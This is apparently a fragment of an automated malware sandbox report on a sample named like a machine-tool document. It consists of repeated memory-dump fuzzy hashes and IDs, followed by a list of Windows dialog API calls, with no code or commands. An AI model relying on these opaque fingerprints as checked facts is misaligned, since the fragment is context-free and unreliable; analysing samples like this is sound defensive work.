                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d75fd0c90902a46d94cac25c5502ee9ed265d520f2e283aca0061debab06c1ed
                                                                                                                                                                                                                          • Instruction ID: a4bf5e82b4e8bc05c8f447ff63f5f3f5982684e7b874ed02cbe993bdfd20c586
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d75fd0c90902a46d94cac25c5502ee9ed265d520f2e283aca0061debab06c1ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FD1B278E00218CFDB55DFA9C950B9DBBB2FF89300F1081A9D849AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 139cce7156fca553e0b2c96439439e353d8e9f28f0a2e01d1476d4ce93eb3997
                                                                                                                                                                                                                          • Instruction ID: 0e6a21c31ecd4d56498a31b006d523e1721d55525580dde0fac4a20f04e9638a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 139cce7156fca553e0b2c96439439e353d8e9f28f0a2e01d1476d4ce93eb3997
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DD1A178E002188FDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355E86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d6be2c1babe78f38169c17d73c8a44921e3b77dfda2bb4830228f3d9d8044641
                                                                                                                                                                                                                          • Instruction ID: 53588b00e217b4f62c7f4c12953312ed5369fc41119abe4207c62b06888c237e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6be2c1babe78f38169c17d73c8a44921e3b77dfda2bb4830228f3d9d8044641
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5ED1B178E00218CFDB55DFA5C951B9DBBB2FF89300F1081A9D848AB364DB356A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ecef4d5fab639cdf09c5c5b6760196ede84456cdffcdcf778d18f2449ca16706
                                                                                                                                                                                                                          • Instruction ID: 3455082899f78f01a97f0e9d4193894e2a6372674b513e98052582e59711e95e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecef4d5fab639cdf09c5c5b6760196ede84456cdffcdcf778d18f2449ca16706
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD1B178E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 823581073c8b74343b05602b62af853dd444af23771eafdaa846a7392a5ec67b
                                                                                                                                                                                                                          • Instruction ID: 680305d4ce4a3d6d496f1c6470db2aaf96e40c97d37f63a43c05f278bbc885b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 823581073c8b74343b05602b62af853dd444af23771eafdaa846a7392a5ec67b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83D1A178E002188FDB55DFA5C950B9DBBB2FF89300F1081A9D849AB364DB356E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 682d78885035704a947ab5df72aa0b48cbc6b096f9ed79a8b5a596a45cedf041
                                                                                                                                                                                                                          • Instruction ID: a557019968fb78333ed7b89f4510f9cf556913d062b743e3d0aef31cc6a10d46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 682d78885035704a947ab5df72aa0b48cbc6b096f9ed79a8b5a596a45cedf041
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6D1B278E012188FDB55DFA5C940B9DBBB2FF89300F5081A9D848AB364DB356A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 005860c526f3934347340d294ca7660b870bf2953798b0b2a47abf3d5c79c9e4
                                                                                                                                                                                                                          • Instruction ID: f378ea109c99d272e4bd84ffbd3085080ebc4645e2a48895d240119464026925
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 005860c526f3934347340d294ca7660b870bf2953798b0b2a47abf3d5c79c9e4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D1A178E003188FDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • Opcode ID: efc09075f0619acc67d493bd9a04224a044121f2b09a348ac11213c94338c2d2
                                                                                                                                                                                                                          • Instruction ID: ae20c1609733f379b03f203201321b406460a7a47dc606f7c997e6f3230f7188
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efc09075f0619acc67d493bd9a04224a044121f2b09a348ac11213c94338c2d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC1A078E00218CFDB55DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359A85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b26a8169df14a136767a870c0210b9c6ad95a9f7043fed4087dfb4fa23639ba6
                                                                                                                                                                                                                          • Instruction ID: 8b18c1870d0c2f39d183905f23aa202d0bf765469ec293bb8bed78681438cdda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b26a8169df14a136767a870c0210b9c6ad95a9f7043fed4087dfb4fa23639ba6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07C19F74E00218CFEB55DFA5C955B9DBBB2AF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a4fd4cc78f374269df66f2e319a49eceb688ca70cffd34042929b2207c05d04a
                                                                                                                                                                                                                          • Instruction ID: 6070f0c3c781f5ce869b699f97c03c45b4f05716f4ee6fa13d0d36637e991a2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4fd4cc78f374269df66f2e319a49eceb688ca70cffd34042929b2207c05d04a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26C1B174E00218CFDB54DFA5C955B9DBBB2BF88300F6081A9D808AB3A5DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 826792fe351a2f72260c87ee3d23f4e68149e350b043d165fca09dd48cb41be3
                                                                                                                                                                                                                          • Instruction ID: 7cbcbe53136ad9633c07f375ef5e7dcf13112164eed697ea0afb7a863f64f3a2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 826792fe351a2f72260c87ee3d23f4e68149e350b043d165fca09dd48cb41be3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77C1A074E00218CFDB55DFA5C995B9DBBB2BF88300F6080A9D808AB365DB355E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 271a58ac6dc569d4983a82e455a897094110da8e1b2a8a0dc046ad4b17d3b425
                                                                                                                                                                                                                          • Instruction ID: 21c4f17cce96d4fbcd6789fa2c139d0add3c71f714f7fc7490b2058da9dba7ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 271a58ac6dc569d4983a82e455a897094110da8e1b2a8a0dc046ad4b17d3b425
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0C1A074E00218CFEB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fc15367a1378fa57806b8f655d504ae52caf5cf95bd4ce5c8f1363d8a713272c
                                                                                                                                                                                                                          • Instruction ID: 9ca74c5e3f1aaa307689ab0259fc07e646c22e8d424d738b10d677a1dc631a3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc15367a1378fa57806b8f655d504ae52caf5cf95bd4ce5c8f1363d8a713272c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC1AF74E01218CFDB54DFA5C995BDDBBB2BF88300F6081A9D808AB365DB359A85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 80b5464d1f86bbee7ce4e76a4e016db7f53f73c51dfa0d7a6b432599ab280283
                                                                                                                                                                                                                          • Instruction ID: 0d8f4d3393d0481ae50864f03b86260b3a2d29a4cc0857dad26f79b69640588e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80b5464d1f86bbee7ce4e76a4e016db7f53f73c51dfa0d7a6b432599ab280283
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC1A074E00218CFDB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB355E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: dce28267f369d5bca57da0207918b934e767202a34240067dfbfdc7145723fee
                                                                                                                                                                                                                          • Instruction ID: ae97baf9999168ee5b4ae8a2fcd27cc5fc6481b6bb0b37d92cb6218ee4723f26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dce28267f369d5bca57da0207918b934e767202a34240067dfbfdc7145723fee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98C19F74E00218CFDB54DFA5C995B9DBBB2BF88300F6081A9D808AB365DB359A85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 482c697d08a26f59617370ef30fae0c0e5290e4b0846366ed1c903201cc66ae4
                                                                                                                                                                                                                          • Instruction ID: 71be0a7694d798a3c8a9a599cca96ab542a5597d9f8bd77e63480fd83421c118
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 482c697d08a26f59617370ef30fae0c0e5290e4b0846366ed1c903201cc66ae4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90C1AF74E00218CFEB55DFA5C995BDDBBB2BF88300F6081A9D808AB365DB355A85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0fb9e6cbeb35d2d016fc7d802b2057539d0c8d502477d69e320800b88956922b
                                                                                                                                                                                                                          • Instruction ID: 160fd3e6b4fb904f8fd2af6ae19b1e1863969bb77dc0ae79d8ccd229b928db05
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fb9e6cbeb35d2d016fc7d802b2057539d0c8d502477d69e320800b88956922b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52C1B174E00218CFDB54DFA5C955B9DBBB2BF88300F6081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3daf2ac9405623c62c949055740b6379bc1cbdad8c38ee93ed3fcfd3a4d794ca
                                                                                                                                                                                                                          • Instruction ID: ea1e5892c0ea6e6891ffeb3274ba57d372f69d16b51d646208a5b64a9dcd87de
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3daf2ac9405623c62c949055740b6379bc1cbdad8c38ee93ed3fcfd3a4d794ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29C19F74E00218CFDB54DFA5C995B9DBBB2FF88300F6081A9D848AB365DB355A85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4e4486c9f10c14f068591bb92c67ea2ae5b47e03a43baac89e5d3e6cb3117478
                                                                                                                                                                                                                          • Instruction ID: 7176e0e43384443dcea827f06bdba14a1da1cfafd60a76f63bb38954b371494a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e4486c9f10c14f068591bb92c67ea2ae5b47e03a43baac89e5d3e6cb3117478
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC1A074E01218CFDB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB355E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c856cd914bbdb43783053fcaf17db32832d265d62daa703bb87a5ec9e2449005
                                                                                                                                                                                                                          • Instruction ID: 2e16c730d57bac4e6b8939d8158dcbd44c69566c7bf22ac06e4e0ce1b180fb4f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c856cd914bbdb43783053fcaf17db32832d265d62daa703bb87a5ec9e2449005
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09C19074E00218CFEB55DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7d839f8fe17dc8cee8a118cfb6edacb6284c4020879847b6cfe0616e575df0d1
                                                                                                                                                                                                                          • Instruction ID: 21be5f93d4f73873e5e4ff726a2d917bbba6792ba813c1b9cd7783cd2ce118af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d839f8fe17dc8cee8a118cfb6edacb6284c4020879847b6cfe0616e575df0d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC19074E00218CFDB55DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5ff549b3d49deaefa4f1c5d8cce40bd698954e94d5bcf052ad4491f45ef00cd5
                                                                                                                                                                                                                          • Instruction ID: 82f31fadfdd524039c13cb2c914077d9b37c970125eb1f3d076ea9ff007ca29e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff549b3d49deaefa4f1c5d8cce40bd698954e94d5bcf052ad4491f45ef00cd5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52C1BF74E00218CFDB54DFA5C985BDDBBB2AF88300F6081A9D848AB365DB359E85CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8ecdc416243bc4600f603b2882c1ada476bce74280d3233bf2ae4bd744e7a8d4
                                                                                                                                                                                                                          • Instruction ID: 4001a1c3c1762febcf9560fb4a22a2e4ed5d8c8c282a83595e2eb0fc87654585
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ecdc416243bc4600f603b2882c1ada476bce74280d3233bf2ae4bd744e7a8d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A18B74A01228CFDB69DF64C854BD9BBB2BF4A304F5085EAD40AA7360DB359E85CF41
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8b89a85b0c9f2b418f7eb95da0ef403354d5ac5025cee5226c991e703459f63b
                                                                                                                                                                                                                          • Instruction ID: feb25fa97ace69da1110d2a01ca87fd7fe79ebf80c70ff678e59c2ced63991f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b89a85b0c9f2b418f7eb95da0ef403354d5ac5025cee5226c991e703459f63b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83517F74A01228CFDB69DF24D854BE9BBB2BF4A305F5085EAD40AA7350CB359E81CF41
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0f2df3ef6eead7d4f393d29ec7d90ce1ac997b37aae7b4ae86edc6d543020f5f
                                                                                                                                                                                                                          • Instruction ID: 703b96fb2dd12674275c31056d7b3b90880e4f8b4e383c58d16d1c15adbd870b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f2df3ef6eead7d4f393d29ec7d90ce1ac997b37aae7b4ae86edc6d543020f5f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8641ADB4D022189FDB04DFA9D594BAEBBF1AF49304F1854A9D810BB290D7399A44CB94
APIs
• GetDlgItem.USER32(?,00000403), ref: 004050B3
• GetDlgItem.USER32(?,000003EE), ref: 004050C2
• GetClientRect.USER32(?,?), ref: 004050FF
• GetSystemMetrics.USER32(00000002), ref: 00405106
• SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405127
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405138
• SendMessageA.USER32(?,00001001,00000000,?), ref: 0040514B
• SendMessageA.USER32(?,00001026,00000000,?), ref: 00405159
• SendMessageA.USER32(?,00001024,00000000,?), ref: 0040516C
• ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518E
• ShowWindow.USER32(?,00000008), ref: 004051A2
• GetDlgItem.USER32(?,000003EC), ref: 004051C3
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051D3
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051EC
• SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F8
• GetDlgItem.USER32(?,000003F8), ref: 004050D1
  • Part of subcall function 00403F17: SendMessageA.USER32(00000028,?,?,00403D48), ref: 00403F25
• GetDlgItem.USER32(?,000003EC), ref: 00405214
• CreateThread.KERNEL32(00000000,00000000,Function_00004FE8,00000000), ref: 00405222
• CloseHandle.KERNEL32(00000000), ref: 00405229
• ShowWindow.USER32(00000000), ref: 0040524C
• ShowWindow.USER32(?,00000008), ref: 00405253
• ShowWindow.USER32(00000008), ref: 00405299
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052CD
                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004052DE
                                                                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004052F3
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405313
